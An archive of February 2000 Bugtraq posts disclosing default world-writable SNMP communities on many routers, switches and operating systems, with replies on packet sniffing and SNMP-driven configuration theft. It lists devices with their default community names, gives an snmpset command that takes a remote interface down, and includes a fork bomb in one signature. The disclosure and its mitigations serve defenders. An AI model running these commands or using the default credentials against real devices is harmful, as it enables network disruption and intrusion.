4802434 2000-02-15 23:40 /80 rader/ Postmaster
Mottagare: Bugtraq (import) <9794>
Ärende: snmp problems still alive...
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Sender: lcamtuf@nimue.ids.pl
X-Nmymbofr: Nir Orb Buk
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <lcamtuf.4.05.10001261159540.1259-100000@nimue.ids.pl>
Date: Mon, 14 Feb 2000 20:00:08 +0100
Reply-To: Michal Zalewski <lcamtuf@AGS.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Zalewski <lcamtuf@AGS.PL>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.21.0002141022210.3096-100000@dione.ids.pl>
Days ago, there was a discussion about world-readable snmp
communities, some people thought it was bad enough. Amazingly, I've
found that a lot of network devices (such as intelligent switches,
WAN/LAN routers, ISDN/DSL modems, remote access machines and even
some user-end operating systems) are by default configured with snmp
enabled and unlimited access with *write* privledges. It allows
attacker to modify routing tables, status of network interfaces and
other vital system data, and seems to be extermely dangerous. To make
things even worse, some devices seems to tell that write permission
for given community is disabled, but you can still successfully write
to it - and other devices won't let you to set up snmp access at all
(eg. some modems and switches).
Here's brief list of devices I've found with world-writable
communities - and names of these communities, respectively:
- 3com Switch 3300 (3Com SuperStack II) - private
- Cray MatchBox router (MR-1110 MatchBox Router/FR 2.01) - private
- 3com RAS (HiPer Access Router Card) - public
- Prestige 128 / 128 Plus - public
- COLTSOHO 2.00.21 - private
- PRT BRI ISDN router - public
- CrossCom XL 2 - private
- WaiLAN Agate 700/800 - public
- HPJ3245A HP Switch 800T - public
- ES-2810 FORE ES-2810, Version 2.20 - public
- Windows NT Version 4.0 - public
- Windows 98 (not 95) - public
- Sun/SPARC Ultra 10 (Ultra-5_10) - private
This list is for sure uncomplete, and might be inaccurate - it has
been created after extensive, but only remote tests on devices
outside my network (usually, these machines are inside ISP networks).
On following devices, some parameters can be changed, but some can't
- so it seems to be less dangerous:
- HP LaserJet (EEPROM G.08.03) - public
- PICO router - public
- Xyplex Router 6.1.1 - private
Best solutions:
- try to disable unlimited snmp access, if possible, then check if it
really worked,
- ask vendor for firmware upgrade,
- do not route traffic addressed to snmp-enabled devices from outside.
Other systems: Cisco and Motorola routers, Netware, most Unix boxes
are not vulnerable.
Exploit code:
$ snmpset hostname {private|public}
interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2
...should bring 1st network interface on remote machine down... for
more interesting options to be set, execute:
$ snmpwalk hostname {private|public}
_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(4802434) ------------------------------------------(Ombruten)
4807141 2000-02-17 08:24 /43 rader/ Postmaster
Mottagare: Bugtraq (import) <9813>
Ärende: Re: Packet Tracing (linux klog patch)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.BSF.4.20.0002152327130.61203-100000@mx.webgiro.com>
Date: Tue, 15 Feb 2000 23:32:08 +0100
Reply-To: Andrzej Bialecki <abial@WEBGIRO.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Andrzej Bialecki <abial@WEBGIRO.COM>
X-To: Dragos Ruiu <dr@DURSEC.COM>
X-cc: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <0002121952193T.02552@smp>
On Sat, 12 Feb 2000, Dragos Ruiu wrote:
> How to use it:
> -This patch makes the kernel log all ethernet packets to syslog.
> -The logging happens at the default level. I.e. normally on.
> -You can turn logging on and off at the console by using the Magic SysRq key
> and a number to change the logging level.
> -Put the interface into promiscuous mode: ifconfig eth0 promisc
>
> Notes:
> -It makes a neat hotkey sniffer when using the text console too.
> -It seems to run pretty fast. Any benchmark data welcome(-->dr@dursec.com).
> -try a tail -f /var/log/messages for real time display
I was wondering... Are you sure it doesn't overrun the kernel message
buffer? I noticed that sometimes, when you produce tons of messages
from within the kernel, some of them are lost.
I would rather use package as NeTraMet for doing this - it also does
very nice traffic compression in the form of flows - very fast,
extremely flexible, uses standard libpcap, doesn't require kernel
patching etc...
Andrzej Bialecki
// <abial@webgiro.com> WebGiro AB, Sweden (http://www.webgiro.com)
// -------------------------------------------------------------------
// ------ FreeBSD: The Power to Serve. http://www.freebsd.org --------
// --- Small & Embedded FreeBSD: http://www.freebsd.org/~picobsd/ ----
(4807141) ------------------------------------------(Ombruten)
Läsa nästa text.
4807145 2000-02-17 08:25 /105 rader/ Postmaster
Mottagare: Bugtraq (import) <9814>
Ärende: Re: snmp problems still alive...
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.BSF.4.10.10002151643520.73248-100000@gauss.worldinter.net>
Date: Tue, 15 Feb 2000 16:51:50 -0600
Reply-To: Gus Huber <gus@GAUSS.WORLDINTER.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Gus Huber <gus@GAUSS.WORLDINTER.NET>
X-To: Michal Zalewski <lcamtuf@AGS.PL>
X-cc: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <lcamtuf.4.05.10001261159540.1259-100000@nimue.ids.pl>
It should be noted in this discussion that MANY of these devices also
through SNMP querys can be completely compromised by either sending
or recieving configuration files from arbritrary locations. Both
cisco and ascend products support downloading and uploading of
configuration files via tftp from an SNMP query. From that point it
is trivial to sniff network trafic. AFAIK, ascend still ships with
the SNMP communitys set as public for read-only, and write for RW.
Also many hardware devices do not log querys sent to invalid SNMP
communitys in SNMPv1, so it is a simple game of brute force to get
those communitys.
To illustrate the damage of leaving your ascend's with default
communitys, there is a small program that will parse the data from
the ascend sniffing debug mode that can be found at
<http://k0dez.pbx.org/stuff/ascenddump.c>. (I think it is there)
SNMP should be disabled unless needed, and if it is should be
firewalled to the appropriate means...
$0.02.....
gus huber <gus@worldinter.net> some punk kid with a bunch of routers
On Mon, 14 Feb 2000, Michal Zalewski wrote:
> Days ago, there was a discussion about world-readable snmp communities,
> some people thought it was bad enough. Amazingly, I've found that a lot of
> network devices (such as intelligent switches, WAN/LAN routers, ISDN/DSL
> modems, remote access machines and even some user-end operating systems)
> are by default configured with snmp enabled and unlimited access with
> *write* privledges. It allows attacker to modify routing tables, status of
> network interfaces and other vital system data, and seems to be extermely
> dangerous. To make things even worse, some devices seems to tell that
> write permission for given community is disabled, but you can still
> successfully write to it - and other devices won't let you to set up snmp
> access at all (eg. some modems and switches).
>
> Here's brief list of devices I've found with world-writable communities -
> and names of these communities, respectively:
>
> - 3com Switch 3300 (3Com SuperStack II) - private
> - Cray MatchBox router (MR-1110 MatchBox Router/FR 2.01) - private
> - 3com RAS (HiPer Access Router Card) - public
> - Prestige 128 / 128 Plus - public
> - COLTSOHO 2.00.21 - private
> - PRT BRI ISDN router - public
> - CrossCom XL 2 - private
> - WaiLAN Agate 700/800 - public
> - HPJ3245A HP Switch 800T - public
> - ES-2810 FORE ES-2810, Version 2.20 - public
> - Windows NT Version 4.0 - public
> - Windows 98 (not 95) - public
> - Sun/SPARC Ultra 10 (Ultra-5_10) - private
>
> This list is for sure uncomplete, and might be inaccurate - it has been
> created after extensive, but only remote tests on devices outside my
> network (usually, these machines are inside ISP networks).
>
> On following devices, some parameters can be changed, but some can't - so
> it seems to be less dangerous:
>
> - HP LaserJet (EEPROM G.08.03) - public
> - PICO router - public
> - Xyplex Router 6.1.1 - private
>
> Best solutions:
>
> - try to disable unlimited snmp access, if possible, then check if it
> really worked,
> - ask vendor for firmware upgrade,
> - do not route traffic addressed to snmp-enabled devices from outside.
>
> Other systems: Cisco and Motorola routers, Netware, most Unix boxes are
> not vulnerable.
>
> Exploit code:
>
> $ snmpset hostname {private|public} interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2
>
> ...should bring 1st network interface on remote machine down... for more
> interesting options to be set, execute:
>
> $ snmpwalk hostname {private|public}
>
> _______________________________________________________
> Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
> [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
> [+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
> =-----=> God is real, unless declared integer. <=-----=
>
(4807145) ------------------------------------------(Ombruten)